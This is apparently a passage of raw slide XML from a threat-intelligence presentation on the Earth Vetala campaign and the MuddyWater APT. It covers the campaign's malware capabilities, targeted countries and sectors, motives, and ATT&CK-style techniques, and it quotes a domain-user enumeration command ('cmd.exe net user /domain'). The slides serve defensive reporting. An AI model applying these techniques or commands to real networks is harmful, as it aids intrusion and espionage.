            <a:pPr marL="457200" lvl="0" indent="-314325" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1350"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Check for Skype connectivity</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Download and install Skype</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Encoded communication with its C2</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Execute commands sent from the C2 server</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Get multifactor authentication settings</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Get the currently logged on user and OS version</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="3400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Earth Vetala Footprint</a:t>
            </a:r>
            <a:endParaRPr sz="1750">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1750">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Earth Vetala conducted an extensive offensive campaign targeting multiple countries. We observed it operating in the following countries:</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Azerbaijan</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Bahrain</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Israel</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Saudi Arabia</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ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>United Arab Emirates</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="135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45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="42375" y="28275"/>
            <a:ext cx="5948949" cy="4931549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="Google Shape;246;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1995875" y="4875000"/>
            <a:ext cx="1957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000">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Affected countries</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Average"/>
              <a:ea typeface="Average"/>
              <a:cs typeface="Average"/>
              <a:sym typeface="Average"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="Google Shape;247;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5991325" y="127175"/>
            <a:ext cx="3123000" cy="1439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ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We observed Earth Vetala target the following sectors:</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-314325" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1350"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Government Agencies</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-314325" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1350"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Academia</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-314325" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1350"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tourism</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>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ru" sz="2150">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Trend Micro Solutions</a:t>
            </a:r>
            <a:endParaRPr sz="3800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="Google Shape;25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1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Earth Vetala represents an interesting threat. While it possesses remote access capabilities, the attackers seem to lack the expertise to use all of these tools correctly. This is unexpected since we believe this attack is connected to the MuddyWater threat actors — and in other connected campaigns, the attackers have shown higher levels of technical skill.</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Our findings in this area were made possible by our Dedicated Intelligence Research (DIR) analysts. They are on-hand to help organizations reach important decisions and understand the nature of the security challenges they face. For more information on the Dedicated Intelligence Research service, please contact your regional Sales team to learn more.</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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0"/>
            <a:ext cx="8520600" cy="593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ru"/>
              <a:t>MOTIVES</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Google Shape;77;p16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="42400" y="494575"/>
            <a:ext cx="9022200" cy="459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1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>MuddyWater, also known as MERCURY or Static Kitten, is an APT group recently attributed to Iran's Ministry of Intelligence and Security (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1200">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MOIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>) by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1200">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U.S. Cyber Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>. This threat actor, active since at least </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk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2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>, frequently conducts campaigns against high-value targets in American, European and Asian countries. Campaigns carried out by the threat actor aim to achieve either of three outcomes:</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="3500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Espionage  - Supporting the political dominance of the nation state in the Middle East. This is business as usual for the threat actor, motivated by nation-state interests.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ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Intellectual property theft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> - Enables economic advantages to the nation state. This goal is accomplished by carrying out aggressive campaigns against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>private entities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> and government affiliated institutions such as universities and research entities.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ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Ransomware attacks - MuddyWater has previously attempted to deploy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId8">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>ransomware such as Thanos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> on victim networks to either destroy evidence of their intrusions or disrupt operations of private organizations.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="3500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>This group frequently relies on the use of DNS as part of their means to contact the command and control (C2), while the initial contact with hosting servers is done via HTTP. Their initial payloads usually use PowerShell and Visual Basic scripting along with LoLBins to assist in the initial stages of the infection.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>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9450"/>
            <a:ext cx="8520600" cy="572400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3305">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Techniques</a:t>
            </a:r>
            <a:endParaRPr sz="3305">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;83;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49450" y="572275"/>
            <a:ext cx="90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verage"/>
              <a:ea typeface="Average"/>
              <a:cs typeface="Average"/>
              <a:sym typeface="Average"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Google Shape;84;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="-50" y="529900"/>
            <a:ext cx="9093000" cy="4564200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="62500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Abuse Elevation Control Mechanism</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Bypass User Account Control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Average"/>
                <a:ea typeface="Average"/>
                <a:cs typeface="Average"/>
                <a:sym typeface="Average"/>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uses various techniques to bypass UAC.</a:t>
            </a:r>
            <a:endParaRPr sz="1550" b="1" i="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Average"/>
              <a:ea typeface="Average"/>
              <a:cs typeface="Average"/>
              <a:sym typeface="Average"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Account Discovery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Domain Account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Average"/>
                <a:ea typeface="Average"/>
                <a:cs typeface="Average"/>
                <a:sym typeface="Average"/>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has used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>cmd.exe net user /domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to enumerate domain users.</a:t>
            </a:r>
            <a:endParaRPr sz="1550" b="1" i="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Average"/>
              <a:ea typeface="Average"/>
              <a:cs typeface="Average"/>
              <a:sym typeface="Average"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId8">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Acquire Infrastructure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId9">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Web Services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Average"/>
                <a:ea typeface="Average"/>
                <a:cs typeface="Average"/>
                <a:sym typeface="Average"/>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has used file sharing services including OneHub to distribute tools.</a:t>
            </a:r>
            <a:endParaRPr sz="1550" b="1" i="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Average"/>
              <a:ea typeface="Average"/>
              <a:cs typeface="Average"/>
              <a:sym typeface="Average"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
